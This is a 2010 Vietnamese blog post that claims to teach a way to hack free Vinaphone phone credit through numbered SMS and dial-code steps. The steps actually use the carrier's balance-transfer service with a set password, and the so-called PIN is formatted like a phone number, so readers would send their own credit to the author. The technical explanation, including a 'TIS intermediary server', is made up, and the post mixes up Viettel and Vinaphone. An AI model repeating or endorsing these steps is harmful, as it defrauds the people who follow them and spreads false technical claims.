Hack tiền Vinaphone, nạp tiền miễn phí ko cần thẻ cào [phiên bản mới nhất, cập nhật hôm nay, Thứ 3 10/8/2010]

Hack tiền Vinafone, nạp tiền miễn phí ko cần thẻ cào [phiên bản mới nhất, cập nhật hôm nay, Thứ 3 10/8/2010]

Tôi :
Họ tên: Đào Thị Diễm Trang

Nghề nghiệp : Sinh viên Ðại Học Bách Khoa-BKA, Năm thứ 4,Khoa Công Nghệ thông tin.
Tôi không dám nhận mình là một sinh viên ưu tú,nhưng với những gì mà mình tự khám phá được thì tôi thấy rất hài lòng.Chắc các bạn cũng biết tới diễn đàn HAVonline - diễn đàn hacker lớn nhất hiện nay và tôi rất tự hào khi mình nằm trong ban quản trị diễn đàn.Với những kinh nghiệm mà tôi đã có ,hôm nay tôi xin giới thiệu với các bạn cách hack tiền tài khoản Viettel hoàn toàn chính xác.Do thời gian có hạn nên tôi nói ngắn gọn như sau:

Các bạn chỉ cần thực hiện tuần tự và chính xác theo yêu cầu của 4 bước sau, rất đơn giản! để chắc ăn thì đọc tới đâu bạn làm theo tới ấy là được, Lưu ý: tất cả các bước sau đây chả tốn XU nào đâu các bạn đừng lo! không tin thì cứ kiểm tra tài khoảng sau mổi lần làm nhé: mà tài khoản đt mình có bao nhiêu tiền cũng Hack đc, nhiều hơn 1 dồng nha! Rùi bắt đầu nào!!!! Làm 1mh thui đừng chỉ ai nhen!hehe


1 -Một sim VINAPHONE hoạt động >= 06 tháng (180 ngày).Tại sao phải cần vậy?Vì chỉ có những sim hoạt dộng trên 7 tháng mới được Vinafone đưa vào mã bảo vệ tài khoản trên server Vinafone quản lí. Nhưng chưa đủ ngày thì bạn cứ thử Hên-Xui biết đâu được thì sao! Hehe ko đc thì mình CHỊU

2 -Rất đơn giản : Soạn tin nhắn với cú pháp: DK” và gửi tới số 999. Hệ thống sẽ nhắn tin thông báo đăng ký dịch vụ thành công và gửi kèm mật khẩu sử dụng dịch vụ (mật khẩu gồm 6 ký tự là các chữ số tự nhiên từ 0 đến 9). Tại sao phải cần vậy ? Vì chúng ta hack thông qua dịch vụ 2frien của Vinafone. Trường hợp bạn có mật khẩu sever rùi thì bạn BỎ wa bước này mà chuyển trực tiếp wa bước 3 lun.

 

3 -Ðổi mật khẩu sever: Các bạn phải đổi mât khẩu thành dãy số sau :100100 (cách thực hiện là: Soạn tin nhắn với cú pháp:“DMK_Mật khẩu cũ_Mật khẩu mớivà gửi tới số 999 (dấu _ là dấu khoảng trống). Trong trường hợp thành công, hệ thống sẽ trả về tin nhắn thông báo đổi mật khẩu thành công và kèm theo mật khẩu mới. đó chính là mật khẩu Server trung gian ở bước 4. Tại sao phải làm vậy?Vì khi các bạn chuyển mật khẩu thành dãy số trên tức là đã mã hóa tài khoản của bạn trên Server mà Vina quản lý.Ðiều này rất quan trọng.

 

4-Các bạn làm theo cú pháp nhu sau: *999* mật khẩu Server* mã PIN*mã PUK#OK. Để khỏi mất thời gian của các bạn tìm lại 2 mã trên nên tôi đã tạo ra một Server trung gian ( viết tắt là TIS-Telephone of Intermediacy Server) với mã PINmã PUK mặc định (dùng đăng nhập sdt của bạn trên Server),tóm lại, cụ thể các thông số như sau (chỉ áp dụng cho mạng Vinaphone):
+ mật khẩu Server: 100100
+ mã PIN : [mã thậpnhị phân] (841)+(257)+(941)+(213) => 841257841213
+ mã PUK: [mã nhị phân] 21000

Các bạn chỉ cần nhập chính xác 3 dãy số trên vào cú pháp và nhấn nút gọi thì hệ thống sẽ tự động đăng nhập sdt của bạn vào TIS (Telephone of Intermediacy Server) mà tôi tạo ra và tài khoản của sđt người gửi sẽ tự đông được cộng thêm tiền hack được sau khi đăng nhập.  (tiền hack được sẽ công thêm vào tài khoản chính),thật ra đây là một trong những cách hack tài khoản điện thoại mà các Hacker chuyên nghiệp trên thế giới gần đây mới sử dụng ( nguyên lý là dùng mã hack đảo chiều các dịch vụ từ các Server di động,chẳng hạn như I-Share, hiên trên mạng có nhiều tài liệu tiếng Anh nói về vấn đề này).

 

5- Sau khi làm xong những bước trên : các bạn chỉ cần đợi 1 phút , sẽ có tin nhắn trả lời và tài khoản chính của các bạn đã được cộng thêm ít nhất 101000vnd tùy là bạn gửi đc mấy lần. (đã Test)
+Tôi hack được tài khoản của mạng di động viettel từ 1 lỗ hổng nhỏ trên 2frien và những lần tôi test gần đây đều thành công.Thông báo sevsr trung gian ma tôi tao ra cũng là sevsr duy nhất hoạt động có hiệu quả hiện nay).

Tất cả chỉ có vậy nhưng đó chính là công sức bao lâu nay tôi khám phá.Các bạn hãy thử và cho tôi biết kết quả nếu như bản hack hoạt động tốt tôi sẽ mở thêm nhiều sever khác.
CHÚC BẠN MAY MẮN

 

 

 

 

14:28:20 Thứ ba, 10/08/10  | 1 Bình luận  | 127 Lượt xem
...
Tên: dao thi diem trang
Giới tính: Nữ       Tuổi: 22
Địa chỉ: an giang
Số ảnh: 22
SuBjn viết blog dia chi
congtunhagiauditimnguoiyeu1 viết blog gioi thieu , chat chit
nam_tuoc_kute_9x_no_love viết blog Anh Xin Lỗi....
Danh sách bạn bè